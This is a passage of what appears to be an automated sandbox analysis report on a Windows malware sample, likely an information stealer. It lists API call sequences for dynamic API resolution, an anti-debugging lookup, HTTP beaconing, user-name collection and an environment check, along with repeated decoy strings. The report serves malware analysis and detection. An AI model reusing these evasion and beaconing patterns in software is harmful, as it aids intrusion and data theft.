                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404780
                                      • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0040479C
                                      Strings
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404765
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404662
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040477B
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046CD
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045C7
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040473F
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045E8
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C2
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404678
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404729
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404683
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D8
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B7
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040466D
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040475A
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404734
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046AC
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045F3
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404657
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045DD
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471E
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040474F
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045D2
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404713
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404770
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                      • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                      • API String ID: 2127927946-2218711628
                                      • Opcode ID: 94e7660d446ef400bbca7e6a05bf8504b75a8e0329621672810e0e1d9e7bb62d
                                      • Instruction ID: 5e1cd967cc1bd71f365b3ff5871be6e8d111942329c8327febd6a33c3aeace51
                                      • Opcode Fuzzy Hash: 94e7660d446ef400bbca7e6a05bf8504b75a8e0329621672810e0e1d9e7bb62d
                                      • Instruction Fuzzy Hash: 5841BD79740624EBC718AFE5EC8DB987F70AB4C712BA0C062F90296190C7F9D5019B3D

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 665 419860-419874 call 419750 668 419a93-419af2 LoadLibraryA * 5 665->668 669 41987a-419a8e call 419780 GetProcAddress * 21 665->669 671 419af4-419b08 GetProcAddress 668->671 672 419b0d-419b14 668->672 669->668 671->672 674 419b46-419b4d 672->674 675 419b16-419b41 GetProcAddress * 2 672->675 676 419b68-419b6f 674->676 677 419b4f-419b63 GetProcAddress 674->677 675->674 678 419b71-419b84 GetProcAddress 676->678 679 419b89-419b90 676->679 677->676 678->679 680 419bc1-419bc2 679->680 681 419b92-419bbc GetProcAddress * 2 679->681 681->680
                                      APIs
                                      • GetProcAddress.KERNEL32(74DD0000,00878BE8), ref: 004198A1
                                      • GetProcAddress.KERNEL32(74DD0000,00878C90), ref: 004198BA
                                      • GetProcAddress.KERNEL32(74DD0000,00878C00), ref: 004198D2
                                      • GetProcAddress.KERNEL32(74DD0000,00878C18), ref: 004198EA
                                      • GetProcAddress.KERNEL32(74DD0000,00878C30), ref: 00419903
                                      • GetProcAddress.KERNEL32(74DD0000,008785A0), ref: 0041991B
                                      • GetProcAddress.KERNEL32(74DD0000,00873288), ref: 00419933
                                      • GetProcAddress.KERNEL32(74DD0000,00873228), ref: 0041994C
                                      • GetProcAddress.KERNEL32(74DD0000,00878C60), ref: 00419964
                                      • GetProcAddress.KERNEL32(74DD0000,00878C78), ref: 0041997C
                                      • GetProcAddress.KERNEL32(74DD0000,00879DD8), ref: 00419995
                                      • GetProcAddress.KERNEL32(74DD0000,00879FE8), ref: 004199AD
                                      • GetProcAddress.KERNEL32(74DD0000,00873008), ref: 004199C5
                                      • GetProcAddress.KERNEL32(74DD0000,00879EB0), ref: 004199DE
                                      • GetProcAddress.KERNEL32(74DD0000,00879EC8), ref: 004199F6
                                      • GetProcAddress.KERNEL32(74DD0000,00873328), ref: 00419A0E
                                      • GetProcAddress.KERNEL32(74DD0000,00879E80), ref: 00419A27
                                      • GetProcAddress.KERNEL32(74DD0000,00879F40), ref: 00419A3F
                                      • GetProcAddress.KERNEL32(74DD0000,008730C8), ref: 00419A57
                                      • GetProcAddress.KERNEL32(74DD0000,00879FA0), ref: 00419A70
                                      • GetProcAddress.KERNEL32(74DD0000,008732E8), ref: 00419A88
                                      • LoadLibraryA.KERNEL32(00879E50,?,00416A00), ref: 00419A9A
                                      • LoadLibraryA.KERNEL32(00879E68,?,00416A00), ref: 00419AAB
                                      • LoadLibraryA.KERNEL32(00879D78,?,00416A00), ref: 00419ABD
                                      • LoadLibraryA.KERNEL32(00879DA8,?,00416A00), ref: 00419ACF
                                      • LoadLibraryA.KERNEL32(00879E38,?,00416A00), ref: 00419AE0
                                      • GetProcAddress.KERNEL32(75A70000,00879DC0), ref: 00419B02
                                      • GetProcAddress.KERNEL32(75290000,00879EE0), ref: 00419B23
                                      • GetProcAddress.KERNEL32(75290000,00879F58), ref: 00419B3B
                                      • GetProcAddress.KERNEL32(75BD0000,00879F70), ref: 00419B5D
                                      • GetProcAddress.KERNEL32(75450000,008731E8), ref: 00419B7E
                                      • GetProcAddress.KERNEL32(76E90000,008785E0), ref: 00419B9F
                                      • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00419BB6
                                      Strings
                                      • NtQueryInformationProcess, xrefs: 00419BAA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID: NtQueryInformationProcess
                                      • API String ID: 2238633743-2781105232
                                      • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                      • Instruction ID: 20ebc6b46c949eaa7f25e90fb8197bb2e58582eade08509f86bd82c1d7e4afd5
                                      • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                      • Instruction Fuzzy Hash: 55A14DBD5C4240BFE354EFE8ED889963BFBF74E301704661AE605C3264D639A841DB12

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 769 404880-404942 call 41a7a0 call 4047b0 call 41a740 * 5 InternetOpenA StrCmpCA 784 404944 769->784 785 40494b-40494f 769->785 784->785 786 404955-404acd call 418b60 call 41a920 call 41a8a0 call 41a800 * 2 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a920 call 41a8a0 call 41a800 * 2 InternetConnectA 785->786 787 404ecb-404ef3 InternetCloseHandle call 41aad0 call 409ac0 785->787 786->787 873 404ad3-404ad7 786->873 797 404f32-404fa2 call 418990 * 2 call 41a7a0 call 41a800 * 8 787->797 798 404ef5-404f2d call 41a820 call 41a9b0 call 41a8a0 call 41a800 787->798 798->797 874 404ae5 873->874 875 404ad9-404ae3 873->875 876 404aef-404b22 HttpOpenRequestA 874->876 875->876 877 404b28-404e28 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a740 call 41a920 * 2 call 41a8a0 call 41a800 * 2 call 41aad0 lstrlenA call 41aad0 * 2 lstrlenA call 41aad0 HttpSendRequestA 876->877 878 404ebe-404ec5 InternetCloseHandle 876->878 989 404e32-404e5c InternetReadFile 877->989 878->787 990 404e67-404eb9 InternetCloseHandle call 41a800 989->990 991 404e5e-404e65 989->991 990->878 991->990 992 404e69-404ea7 call 41a9b0 call 41a8a0 call 41a800 991->992 992->989
                                      APIs
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                        • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                        • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404915
                                      • StrCmpCA.SHLWAPI(?,00882630), ref: 0040493A
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404ABA
                                      • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,",00000000,?,008825F0), ref: 00404DE8
                                      • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E04
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E18
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E49
                                      • InternetCloseHandle.WININET(00000000), ref: 00404EAD
                                      • InternetCloseHandle.WININET(00000000), ref: 00404EC5
                                      • HttpOpenRequestA.WININET(00000000,00882520,?,00881E28,00000000,00000000,00400100,00000000), ref: 00404B15
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • InternetCloseHandle.WININET(00000000), ref: 00404ECF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                      • String ID: "$"$------$------$------
                                      • API String ID: 2402878923-2180234286
                                      • Opcode ID: af53b45c7d1414e7dc20276c78a04a4b8699d49fd5fc4d623f408e49df179ce7
                                      • Instruction ID: 3f466b8612cc2db17a5d9ea90efc92506b51061f54fe9a8e3d974c375c306076
                                      • Opcode Fuzzy Hash: af53b45c7d1414e7dc20276c78a04a4b8699d49fd5fc4d623f408e49df179ce7
                                      • Instruction Fuzzy Hash: 10124EB1911118AADB14FB91DD92FEEB339AF14314F50419EB10672091DF382F9ACF6A
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                      • HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                      • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocNameProcessUser
                                      • String ID:
                                      • API String ID: 1206570057-0
                                      • Opcode ID: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                      • Instruction ID: ff9f3fb77af2488786a742b30a7a77c7a6675fe12b7944dcc27658a291e6e945
                                      • Opcode Fuzzy Hash: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                      • Instruction Fuzzy Hash: 08F04FB5D44208AFC710DFD8DD49BAEBBB8EB05711F10025AFA05A2680C77815448BA2
                                      APIs
                                      • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                      • ExitProcess.KERNEL32 ref: 0040117E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitInfoProcessSystem
                                      • String ID:
                                      • API String ID: 752954902-0
                                      • Opcode ID: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                      • Instruction ID: a8b5f4e8781596c88644d8aa2969b9d6e82c50da38cf1cac8898b5ca04c80d98
                                      • Opcode Fuzzy Hash: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                      • Instruction Fuzzy Hash: F4D05E7C94030CEBCB14EFE0D9496DDBB79FB0D311F001559ED0572340EA306481CAA6

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 633 419c10-419c1a 634 419c20-41a031 GetProcAddress * 43 633->634 635 41a036-41a0ca LoadLibraryA * 8 633->635 634->635 636 41a146-41a14d 635->636 637 41a0cc-41a141 GetProcAddress * 5 635->637 638 41a153-41a211 GetProcAddress * 8 636->638 639 41a216-41a21d 636->639 637->636 638->639 640 41a298-41a29f 639->640 641 41a21f-41a293 GetProcAddress * 5 639->641 642 41a2a5-41a332 GetProcAddress * 6 640->642 643 41a337-41a33e 640->643 641->640 642->643 644 41a344-41a41a GetProcAddress * 9 643->644 645 41a41f-41a426 643->645 644->645 646 41a4a2-41a4a9 645->646 647 41a428-41a49d GetProcAddress * 5 645->647 648 41a4ab-41a4d7 GetProcAddress * 2 646->648 649 41a4dc-41a4e3 646->649 647->646 648->649 650 41a515-41a51c 649->650 651 41a4e5-41a510 GetProcAddress * 2 649->651 652 41a612-41a619 650->652 653 41a522-41a60d GetProcAddress * 10 650->653 651->650 654 41a61b-41a678 GetProcAddress * 4 652->654 655 41a67d-41a684 652->655 653->652 654->655 656 41a686-41a699 GetProcAddress 655->656 657 41a69e-41a6a5 655->657 656->657 658 41a6a7-41a703 GetProcAddress * 4 657->658 659 41a708-41a709 657->659 658->659
                                      APIs
                                      • GetProcAddress.KERNEL32(74DD0000,00872FE8), ref: 00419C2D
                                      • GetProcAddress.KERNEL32(74DD0000,00873088), ref: 00419C45
                                      • GetProcAddress.KERNEL32(74DD0000,0087A048), ref: 00419C5E
                                      • GetProcAddress.KERNEL32(74DD0000,0087A090), ref: 00419C76
                                      • GetProcAddress.KERNEL32(74DD0000,0087A0A8), ref: 00419C8E
                                      • GetProcAddress.KERNEL32(74DD0000,0087A0C0), ref: 00419CA7
                                      • GetProcAddress.KERNEL32(74DD0000,0087CB30), ref: 00419CBF
                                      • GetProcAddress.KERNEL32(74DD0000,0087A030), ref: 00419CD7
                                      • GetProcAddress.KERNEL32(74DD0000,0087A018), ref: 00419CF0
                                      • GetProcAddress.KERNEL32(74DD0000,0087A060), ref: 00419D08
                                      • GetProcAddress.KERNEL32(74DD0000,0087A000), ref: 00419D20
                                      • GetProcAddress.KERNEL32(74DD0000,00873208), ref: 00419D39
                                      • GetProcAddress.KERNEL32(74DD0000,00873368), ref: 00419D51
                                      • GetProcAddress.KERNEL32(74DD0000,008732A8), ref: 00419D69
                                      • GetProcAddress.KERNEL32(74DD0000,008730A8), ref: 00419D82
                                      • GetProcAddress.KERNEL32(74DD0000,00880530), ref: 00419D9A
                                      • GetProcAddress.KERNEL32(74DD0000,00880500), ref: 00419DB2
                                      • GetProcAddress.KERNEL32(74DD0000,0087CF90), ref: 00419DCB
                                      • GetProcAddress.KERNEL32(74DD0000,00873108), ref: 00419DE3
                                      • GetProcAddress.KERNEL32(74DD0000,00880548), ref: 00419DFB
                                      • GetProcAddress.KERNEL32(74DD0000,008803B0), ref: 00419E14
                                      • GetProcAddress.KERNEL32(74DD0000,00880458), ref: 00419E2C
                                      • GetProcAddress.KERNEL32(74DD0000,00880560), ref: 00419E44
                                      • GetProcAddress.KERNEL32(74DD0000,00873188), ref: 00419E5D
                                      • GetProcAddress.KERNEL32(74DD0000,00880518), ref: 00419E75
                                      • GetProcAddress.KERNEL32(74DD0000,00880578), ref: 00419E8D
                                      • GetProcAddress.KERNEL32(74DD0000,00880290), ref: 00419EA6
                                      • GetProcAddress.KERNEL32(74DD0000,008802A8), ref: 00419EBE
                                      • GetProcAddress.KERNEL32(74DD0000,008802C0), ref: 00419ED6
                                      • GetProcAddress.KERNEL32(74DD0000,00880368), ref: 00419EEF
                                      • GetProcAddress.KERNEL32(74DD0000,008802D8), ref: 00419F07
                                      • GetProcAddress.KERNEL32(74DD0000,008804E8), ref: 00419F1F
                                      • GetProcAddress.KERNEL32(74DD0000,00880380), ref: 00419F38
                                      • GetProcAddress.KERNEL32(74DD0000,0087C658), ref: 00419F50
                                      • GetProcAddress.KERNEL32(74DD0000,00880440), ref: 00419F68
                                      • GetProcAddress.KERNEL32(74DD0000,00880350), ref: 00419F81
                                      • GetProcAddress.KERNEL32(74DD0000,00873148), ref: 00419F99
                                      • GetProcAddress.KERNEL32(74DD0000,008802F0), ref: 00419FB1
                                      • GetProcAddress.KERNEL32(74DD0000,008731A8), ref: 00419FCA
                                      • GetProcAddress.KERNEL32(74DD0000,00880398), ref: 00419FE2
                                      • GetProcAddress.KERNEL32(74DD0000,00880308), ref: 00419FFA
                                      • GetProcAddress.KERNEL32(74DD0000,00873248), ref: 0041A013
                                      • GetProcAddress.KERNEL32(74DD0000,00872E28), ref: 0041A02B
                                      • LoadLibraryA.KERNEL32(00880320,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A03D
                                      • LoadLibraryA.KERNEL32(008803C8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A04E
                                      • LoadLibraryA.KERNEL32(00880338,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A060
                                      • LoadLibraryA.KERNEL32(008803E0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A072
                                      • LoadLibraryA.KERNEL32(008803F8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A083
                                      • LoadLibraryA.KERNEL32(00880410,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A095
